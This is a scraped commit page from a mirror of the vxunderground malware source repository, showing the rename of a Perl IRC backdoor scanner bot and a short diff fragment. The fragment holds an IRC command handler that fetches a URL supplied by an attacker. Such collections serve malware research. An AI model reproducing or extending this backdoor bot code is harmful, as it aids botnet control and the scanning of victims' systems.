13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00

Rename Backdoor.Perl.IRCBot.t to Backdoor.Perl.IRCBot.Scanner.tc

This commit is contained in:
vxunderground 2020-11-14 00:56:31 -06:00 committed by GitHub
parent e0b5cd251d
commit 5cc5054079
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -107,7 +107,7 @@ while ( $line = <$dsp> ) {
}
if ( $line =~ /PRIVMSG $channel :!id/ )
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
my $testid = $id;
my $req = HTTP::Request->new( GET => $testid );
my $ua = LWP::UserAgent->new();